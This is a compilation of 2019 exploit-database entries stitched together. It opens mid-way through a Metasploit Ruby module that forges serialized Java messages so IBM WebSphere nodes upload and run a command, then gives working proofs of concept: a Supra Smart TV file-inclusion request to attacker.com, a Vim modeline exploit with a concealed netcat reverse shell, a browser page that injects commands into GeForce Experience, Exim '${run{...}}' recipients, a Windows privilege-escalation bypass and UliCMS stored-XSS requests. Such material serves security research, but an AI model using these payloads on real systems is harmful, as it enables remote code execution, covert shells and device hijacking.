Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;") msg_obj = build_message(obj, msg_id, msg_type, field_type) # Create the port field and add the reference boot_time_field = Rex::Java::Serialization::Model::Field.new boot_time_field.type = 'long' boot_time_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bootTime') # Create the port field and add the reference tcp_port_field = Rex::Java::Serialization::Model::Field.new tcp_port_field.type = 'int' tcp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'tcpPort') # Create the port field and add the reference udp_port_field = Rex::Java::Serialization::Model::Field.new udp_port_field.type = 'int' udp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'udpPort') # Create the object field and add the reference ip_arr_field = Rex::Java::Serialization::Model::Field.new ip_arr_field.type = 'array' ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ip') ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B') # Create the task object field and add field_type node_prop_field = Rex::Java::Serialization::Model::Field.new node_prop_field.type = 'object' node_prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'nodeProperty') node_prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Lcom/ibm/son/mesh/AppLevelNodeProperty;") # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.TcpNodeMessage') msg_class_desc.serial_version = 1 msg_class_desc.flags = 2 msg_class_desc.fields = [] msg_class_desc.fields << boot_time_field msg_class_desc.fields << tcp_port_field msg_class_desc.fields << udp_port_field msg_class_desc.fields << ip_arr_field msg_class_desc.fields << node_prop_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = msg_obj # Construct IP Array ip_arr = source_ip.split(".").map(&:to_i) builder = Rex::Java::Serialization::Builder.new values_array = builder.new_array( values_type: 'byte', values: ip_arr, name: '[B', serial: 0x42acf317f8060854e0, annotations: [Rex::Java::Serialization::Model::EndBlockData.new] ) # Set the member values obj.class_data << ['long', 0] obj.class_data << ['int', source_port] obj.class_data << ['int', source_port] obj.class_data << values_array obj.class_data << p2p_obj msg_class_desc end def build_app_node_class(obj) # Create the structured gateway field and add the reference struct_bool_field = Rex::Java::Serialization::Model::Field.new struct_bool_field.type = 'boolean' struct_bool_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'structuredGateway') # Create the version field and add the reference version_field = Rex::Java::Serialization::Model::Field.new version_field.type = 'int' version_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'version') # Create the object field and add the reference bridge_field = Rex::Java::Serialization::Model::Field.new bridge_field.type = 'object' bridge_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bridgedCellsList') bridge_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/List;') # Create the field ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4 # Create the cellname field and add the reference cellname_field = Rex::Java::Serialization::Model::Field.new cellname_field.type = 'object' cellname_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'cellName') cellname_field.field_type = field_ref # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.AppLevelNodeProperty') msg_class_desc.serial_version = 1 msg_class_desc.flags = 2 msg_class_desc.fields = [] msg_class_desc.fields << struct_bool_field msg_class_desc.fields << version_field msg_class_desc.fields << bridge_field msg_class_desc.fields << cellname_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new # Set the member values obj.class_data << ['boolean', 0] obj.class_data << ['int', 0] obj.class_data << Rex::Java::Serialization::Model::NullReference.new obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name msg_class_desc end def build_hashtable_class(obj) # Create the integer field and add the reference load_field = Rex::Java::Serialization::Model::Field.new load_field.type = 'float' load_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'loadFactor') # Create the integer field and add the reference threshold_field = Rex::Java::Serialization::Model::Field.new threshold_field.type = 'int' threshold_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'threshold') # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Hashtable') msg_class_desc.serial_version = 0x13BB0F25214AE4B8 msg_class_desc.flags = 3 msg_class_desc.fields = [] msg_class_desc.fields << load_field msg_class_desc.fields << threshold_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new obj.class_data << ['float', 0.75] obj.class_data << ['int', 8] obj.class_data << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x0b\x00\x00\x00\x03") msg_class_desc end def build_properties_class # Create the object object = Rex::Java::Serialization::Model::NewObject.new object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new msg_obj = build_hashtable_class(object) # Create the field ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 9 # Create the integer field and add the reference defaults_field = Rex::Java::Serialization::Model::Field.new defaults_field.type = 'object' defaults_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'defaults') defaults_field.field_type = field_ref # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Properties') msg_class_desc.serial_version = 0x3912D07A70363E98 msg_class_desc.flags = 2 msg_class_desc.fields = [] msg_class_desc.fields << defaults_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = msg_obj # Set the member values object.class_desc.description = msg_class_desc object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'memberName') object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'inOdc') object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, '0') object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'epoch') object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, (Time.now.to_f * 1000).to_i.to_s) object end def build_p2p_node_class(obj) msg_obj = build_app_node_class(obj) # Create the field ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1 # Create the data field and add the reference data_field = Rex::Java::Serialization::Model::Field.new data_field.type = 'array' data_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'data') data_field.field_type = field_ref # Create the object field and add the reference prop_field = Rex::Java::Serialization::Model::Field.new prop_field.type = 'object' prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'properties') prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/Properties;') # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.ws.wsgroup.p2p.P2PShimNodeProperty') msg_class_desc.serial_version = 2 msg_class_desc.flags = 2 msg_class_desc.fields = [] msg_class_desc.fields << data_field msg_class_desc.fields << prop_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = msg_obj # Create the byte array ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 6 # Construct IP Array byte_array = Rex::Java::Serialization::Model::NewArray.new byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new byte_array.array_description.description = field_ref byte_array.type = "byte" byte_array.values = [] # Set the member values obj.class_data << byte_array # Add properties obj.class_data << build_properties_class msg_class_desc end def build_upfile_arg_class(filename, bytes, cmd) # Create the field ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1 # Create the integer field and add the reference filename_field = Rex::Java::Serialization::Model::Field.new filename_field.type = 'object' filename_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileName') filename_field.field_type = field_ref # Create the field ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4 # Create the integer field and add the reference filebody_field = Rex::Java::Serialization::Model::Field.new filebody_field.type = 'array' filebody_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileBody') filebody_field.field_type = field_ref # Create the field ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1 # Create the object field and add the reference post_cmd_field = Rex::Java::Serialization::Model::Field.new post_cmd_field.type = 'object' post_cmd_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'postProcCmd') post_cmd_field.field_type = field_ref # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileArgument') msg_class_desc.serial_version = 1 msg_class_desc.flags = 2 msg_class_desc.fields = [] msg_class_desc.fields << filebody_field msg_class_desc.fields << filename_field msg_class_desc.fields << post_cmd_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new # Create the byte array ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 7 # Construct IP Array byte_array = Rex::Java::Serialization::Model::NewArray.new byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new byte_array.array_description.description = field_ref byte_array.type = "byte" byte_array.values = bytes # Set the member values object = Rex::Java::Serialization::Model::NewObject.new object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new object.class_desc.description = msg_class_desc object.class_data << byte_array object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, filename) object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, cmd) object end def build_bcast_run_task_msg(obj, msg_type, source_ip, source_port, upfile_arg_obj) msg_obj = build_bcast_flood_msg(obj, msg_type, source_ip, source_port) # Create the integer field and add the reference out_int_field = Rex::Java::Serialization::Model::Field.new out_int_field.type = 'int' out_int_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'outputGatherInterval') # Create the task object field and add field_type task_field = Rex::Java::Serialization::Model::Field.new task_field.type = 'object' task_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'task') task_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;") # Create the task object field and add field_type task_arg_field = Rex::Java::Serialization::Model::Field.new task_arg_field.type = 'object' task_arg_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'taskArgument') task_arg_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/io/Serializable;") # Create the integer field and add the reference forward_gather_field = Rex::Java::Serialization::Model::Field.new forward_gather_field.type = 'int' forward_gather_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'forwardGatheredDataPipelinePeriod') # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.BcastMsgRunTask') msg_class_desc.serial_version = 1 msg_class_desc.flags = 2 msg_class_desc.fields = [] msg_class_desc.fields << forward_gather_field msg_class_desc.fields << out_int_field msg_class_desc.fields << task_field msg_class_desc.fields << task_arg_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = msg_obj # Set the member values obj.class_data << ['int', 0] obj.class_data << ['int', 1] obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileToAllNodes') obj.class_data << upfile_arg_obj msg_class_desc end end

Exploit Title: Remote file inclusion # Date: 03-06-2019 # Exploit Author: Dhiraj Mishra # Vendor Homepage: https://supra.ru # Software Link: https://supra.ru/catalog/televizory/televizor_supra_stv_lc40lt0020f/ # CVE: CVE-2019-12477 # References: # https://nvd.nist.gov/vuln/detail/CVE-2019-12477 # https://www.inputzero.io/2019/06/hacking-smart-tv.html Summary: Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication via a /remote/media_control?action=setUri&uri=URI Technical Observation: We are abusing `openLiveURL()` which allows a local attacker to broadcast video on supra smart cloud TV. I found this vulnerability initially by source code review and then by crawling the application and reading every request helped me to trigger this vulnerability. Vulnerable code: function openLiveTV(url) { $.get("/remote/media_control", {m_action:'setUri',m_uri:url,m_type:'video/*'}, function (data, textStatus){ if("success"==textStatus){ alert(textStatus); }else { alert(textStatus); } }); } Vulnerable request: GET /remote/media_control?action=setUri&uri= http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1 Host: 192.168.1.155 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 To trigger the vulnerability you can send a crafted request to the URL, http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 Although the above mention URL takes (.m3u8) format based video. We can use `curl -v -X GET` to send such request, typically this is an unauth remote file inclusion. An attacker could broadcast any video without any authentication, the worst case attacker could leverage this vulnerability to broadcast a fake emergency message.

*by Arminius ([@rawsec](https://twitter.com/rawsec))* Vim/Neovim Arbitrary Code Execution via Modelines ================================================= ``` Product: Vim < 8.1.1365, Neovim < 0.3.6 Type: Arbitrary Code Execution CVE: CVE-2019-12735 Date: 2019-06-04 Author: Arminius (@rawsec) ``` Summary ------- Vim before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code execution via modelines by opening a specially crafted text file. Proof of concept ---------------- - Create [`poc.txt`](../data/2019-06-04_ace-vim-neovim/poc.txt): :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" - Ensure that the modeline option has not been disabled (`:set modeline`). - Open the file in Vim: $ vim poc.txt - The system will execute `uname -a`. Proof of concept 2 (reverse shell) ---------------------------------- This PoC outlines a real-life attack approach in which a reverse shell is launched once the user opens the file. To conceal the attack, the file will be immediately rewritten when opened. Also, the PoC uses terminal escape sequences to hide the modeline when the content is printed with `cat`. (`cat -v` reveals the actual content.) [`shell.txt`](../data/2019-06-04_ace-vim-neovim/shell.txt): \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n Demo (victim left, attacker right):  Details ------- The modeline feature allows to specify custom editor options near the start or end of a file. This feature is enabled by default and applied to all file types, including plain `.txt`. A typical modeline: /* vim: set textwidth=80 tabstop=8: */ For security reasons, only a subset of options is permitted in modelines, and if the option value contains an expression, it is executed in a sandbox: [[1]] No other commands than "set" are supported, for security reasons (somebody might create a Trojan horse text file with modelines). And not all options can be set. For some options a flag is set, so that when it's used the |sandbox| is effective. The sandbox is meant to prevent side effects: [[2]] The 'foldexpr', 'formatexpr', 'includeexpr', 'indentexpr', 'statusline' and 'foldtext' options may be evaluated in a sandbox. This means that you are protected from these expressions having nasty side effects. This gives some safety for when these options are set from a modeline. However, the `:source!` command (with the bang [`!`] modifier) can be used to bypass the sandbox. It reads and executes commands from a given file as if *typed manually*, running them after the sandbox has been left. [[3]] :so[urce]! {file} Read Vim commands from {file}. These are commands that are executed from Normal mode, like you type them. Thus, one can trivially construct a modeline that runs code outside the sandbox: # vim: set foldexpr=execute('\:source! some_file'): An additional step is needed for Neovim which blacklists `execute()`: [[4]] execute({command} [, {silent}]) *execute()* Execute {command} and capture its output. [...] This function is not available in the |sandbox|. Here, `assert_fails()` can be used instead, which takes a `{cmd}` argument, too: [[5]] assert_fails({cmd} [, {error} [, {msg}]]) *assert_fails()* Run {cmd} and add an error message to |v:errors| if it does NOT produce an error. The following modeline utilizes a fold expression to run `source! %` to execute the current file, which in turn executes `uname -a || "(garbage)"` as a shell command: :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" Additionally, the Neovim-only function `nvim_input()` is vulnerable to the same approach via e.g.: vi:fen:fdm=expr:fde=nvim_input("\:terminal\ uname\ -a"):fdl=0 (In the past, other modeline-related vulnerabilities have been patched in Vim - see [CVE-2002-1377](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1377), [CVE-2016-1248](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1248).) Patches ------- - [Vim patch 8.1.1365](https://github.com/vim/vim/commit/5357552) - [Neovim patch](https://github.com/neovim/neovim/pull/10082) (released in [v0.3.6](https://github.com/neovim/neovim/releases/tag/v0.3.6)) Beyond patching, it's recommended to disable modelines in the vimrc (`set nomodeline`), to use the [securemodelines](https://github.com/ciaranm/securemodelines/) plugin, or to disable `modelineexpr` (since patch 8.1.1366, Vim-only) to disallow expressions in modelines. Timeline -------- - 2019-05-22 Vim and Neovim maintainers notified - 2019-05-23 Vim patch released - 2019-05-29 Neovim patch released - 2019-06-05 CVE ID CVE-2019-12735 assigned Also see description of [CVE-2019-12735](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12735). [1]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/options.txt#L582 [2]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/eval.txt#L13050 [3]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/repeat.txt#L182 [4]: https://github.com/neovim/neovim/blob/1060bfd0338253107deaac346e362a9feab32068/runtime/doc/eval.txt#L3247 [5]: https://github.com/neovim/neovim/blob/1060bfd0338253107deaac346e362a9feab32068/runtime/doc/eval.txt#L2494 [6]: https://github.com/vim/vim/releases/tag/v8.1.1365 [7]: https://github.com/neovim/neovim/releases/tag/v0.3.6

<!-- POC for CVE‑2019‑5678 Nvidia GeForce Experience OS command injection via a web browser Author: David Yesland -- Rhino Security Labs --> <html> <head> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script> </head> <body> <script> //Send request to local GFE server function submitRequest(port,secret) { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/127.0.0.1:"+port+"\/gfeupdate\/autoGFEInstall\/", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "text\/html"); xhr.setRequestHeader("X_LOCAL_SECURITY_COOKIE", secret); var body = "\""+document.getElementById("cmd").value+"\""; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } $(document).on('change', '.file-upload-button', function(event) { var reader = new FileReader(); reader.onload = function(event) { var jsonObj = JSON.parse(event.target.result); submitRequest(jsonObj.port,jsonObj.secret); } reader.readAsText(event.target.files[0]); }); //Copy text from some text field function myFunction() { var copyText = document.getElementById("myInput"); copyText.select(); document.execCommand("copy"); } //trigger the copy and file window on ctrl press $(document).keydown(function(keyPressed) { if (keyPressed.keyCode == 17) { myFunction();document.getElementById('file-input').click(); } }); </script> <h2> Press CTRL+V+Enter </h2> <!--Command to run in a hidden input field--> <input type="hidden" value="calc.exe" id="cmd" size="55"> <!--Hidden text box to copy text from--> <div style="opacity: 0.0;"> <input type="text" value="%LOCALAPPDATA%\NVIDIA Corporation\NvNode\nodejs.json" id="myInput" size="1"> </div> <!--file input--> <input id="file-input" onchange="file_changed(this)" onclick="this.value=null;" accept="application/json" class='file-upload-button' type="file" name="name" style="display: none;" /> </body> </html>

Qualys Security Advisory The Return of the WIZard: RCE in Exim (CVE-2019-10149) ======================================================================== Contents ======================================================================== Summary Local exploitation Remote exploitation - Non-default configurations - Default configuration Acknowledgments Timeline Boromir: "What is this new devilry?" Gandalf: "A Balrog. A demon of the Ancient World." -- The Lord of the Rings: The Fellowship of the Ring ======================================================================== Summary ======================================================================== During a code review of the latest changes in the Exim mail server (https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability in versions 4.87 to 4.91 (inclusive). In this particular case, RCE means Remote *Command* Execution, not Remote Code Execution: an attacker can execute arbitrary commands with execv(), as root; no memory corruption or ROP (Return-Oriented Programming) is involved. This vulnerability is exploitable instantly by a local attacker (and by a remote attacker in certain non-default configurations). To remotely exploit this vulnerability in the default configuration, an attacker must keep a connection to the vulnerable server open for 7 days (by transmitting one byte every few minutes). However, because of the extreme complexity of Exim's code, we cannot guarantee that this exploitation method is unique; faster methods may exist. Exim is vulnerable by default since version 4.87 (released on April 6, 2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and older versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled manually. Surprisingly, this vulnerability was fixed in version 4.92 (released on February 10, 2019): https://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8... https://bugs.exim.org/show_bug.cgi?id=2310 but was not identified as a security vulnerability, and most operating systems are therefore affected. For example, we exploit an up-to-date Debian distribution (9.9) in this advisory. ======================================================================== Local exploitation ======================================================================== The vulnerable code is located in deliver_message(): 6122 #ifndef DISABLE_EVENT 6123 if (process_recipients != RECIP_ACCEPT) 6124 { 6125 uschar * save_local = deliver_localpart; 6126 const uschar * save_domain = deliver_domain; 6127 6128 deliver_localpart = expand_string( 6129 string_sprintf("${local_part:%s}", new->address)); 6130 deliver_domain = expand_string( 6131 string_sprintf("${domain:%s}", new->address)); 6132 6133 (void) event_raise(event_action, 6134 US"msg:fail:internal", new->message); 6135 6136 deliver_localpart = save_local; 6137 deliver_domain = save_domain; 6138 } 6139 #endif Because expand_string() recognizes the "${run{<command> <args>}}" expansion item, and because new->address is the recipient of the mail that is being delivered, a local attacker can simply send a mail to "${run{...}}@localhost" (where "localhost" is one of Exim's local_domains) and execute arbitrary commands, as root (deliver_drop_privilege is false, by default): [...] ======================================================================== Remote exploitation ======================================================================== Our local-exploitation method does not work remotely, because the "verify = recipient" ACL (Access-Control List) in Exim's default configuration requires the local part of the recipient's address (the part that precedes the @ sign) to be the name of a local user: [...] ------------------------------------------------------------------------ Non-default configurations ------------------------------------------------------------------------ We eventually devised an elaborate method for exploiting Exim remotely in its default configuration, but we first identified various non-default configurations that are easy to exploit remotely: - If the "verify = recipient" ACL was removed manually by an administrator (maybe to prevent username enumeration via RCPT TO), then our local-exploitation method also works remotely. - If Exim was configured to recognize tags in the local part of the recipient's address (via "local_part_suffix = +* : -*" for example), then a remote attacker can simply reuse our local-exploitation method with an RCPT TO "balrog+${run{...}}@localhost" (where "balrog" is the name of a local user). - If Exim was configured to relay mail to a remote domain, as a secondary MX (Mail eXchange), then a remote attacker can simply reuse our local-exploitation method with an RCPT TO "${run{...}}@khazad.dum" (where "khazad.dum" is one of Exim's relay_to_domains). Indeed, the "verify = recipient" ACL can only check the domain part of a remote address (the part that follows the @ sign), not the local part. ------------------------------------------------------------------------ Default configuration ------------------------------------------------------------------------ [...] ======================================================================== Acknowledgments ======================================================================== We thank Exim's developers, Solar Designer, and the members of distros@openwall. "The Return of the WIZard" is a reference to Sendmail's ancient WIZ and DEBUG vulnerabilities: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145 https://seclists.org/bugtraq/1995/Feb/56 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095 http://www.cheswick.com/ches/papers/berferd.pdf ======================================================================== Timeline ======================================================================== 2019-05-27: Advisory sent to security@exim. 2019-05-28: Advisory sent to distros@openwall.

CVE-2019-0841 BYPASS #2 There is a second bypass for CVE-2019-0841. This can be triggered as following: Delete all files and subfolders within "c:\users\%username%\appdata\local\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\" (atleast the ones we can delete as user) Try to launch edge. It will crash the first time. When we launch it a second time, it will write the DACL while impersonating "SYSTEM". The trick here is to launch edge by clicking it on the taskbar or desktop, using "start microsoft-edge:" seems to result in correct impersonation. You can still do this completely programmatically.. since edge will always be in the same position in the task bar.. *cough* sendinput *cough*. There is probably other ways too. Another note, this bug is most definitely not restricted to edge. This will be triggered with other packages too. So you can definitely figure out a way to trigger this bug silently without having edge pop up. Or you could probably minimize edge as soon as it launches and close it as soon as the bug completes. I think it will also trigger by just launching edge once, but sometimes you may have to wait a little. I didn't do extensive testing.. found this bug and quickly wrote up a poc, took me like 2 hours total, finding LPEs is easy. To repro: 1. Launch my poc 2. Launch edge several times Use video demo as guidance. Also, I don't get paid for dropping bugs, so if you want a simple and full exploit, then go fucking write it yourself, I have better things to do, such as preparing my voyage into the arctic. You're welcome. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!IMPORTANT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Make sure you have multiple cores in your VM (not multiple processors, multiple cores). It's going to increase the thread priority to increase our odds of winning the race condition that this exploits. If your VM freezes it means you either have 1 core or set your vm to have multiple processors instead of multiple cores... which will also cause it to lock up. EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46976.zip

# Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting # Google Dork: intext:"by UliCMS" # Date: 2019-05-12 # Exploit Author: Unk9vvN # Vendor Homepage: https://en.ulicms.de # Software Link: https://www.ulicms.de/aktuelles.html?single=ulicms-20191-spitting-lama-ist-fertig # Version: 2019.1 # Tested on: Kali Linux # CVE : CVE-2019-11398 # Description # This vulnerability is in the authentication state and is located in the CMS management panel, and the type of vulnerability is Stored and the vulnerability parameters are as follows. # Vuln One # URI: POST /ulicms/admin/index.php?action=languages # Parameter: name="><script>alert('UNK9VVN')</script> # Vuln Two # URI: POST /ulicms/admin/index.php?action=pages_edit&page=23 # Parameter: systemname="><script>alert('UNK9VVN')</script> # # PoC POST (Cross Site Scripting Stored) # POST /ulicms/admin/index.php HTTP/1.1 Host: XXXXXXXX.ngrok.io User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=languages Content-Type: application/x-www-form-urlencoded Content-Length: 165 Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=LanguageController&sMethod=create&language_code=U9N&name=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E # # PoC POST (Cross Site Scripting Stored) # POST /ulicms/admin/index.php HTTP/1.1 Host: XXXXXXXX.ngrok.io User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=pages_edit&page=23 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 904 Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8 Connection: close DNT: 1 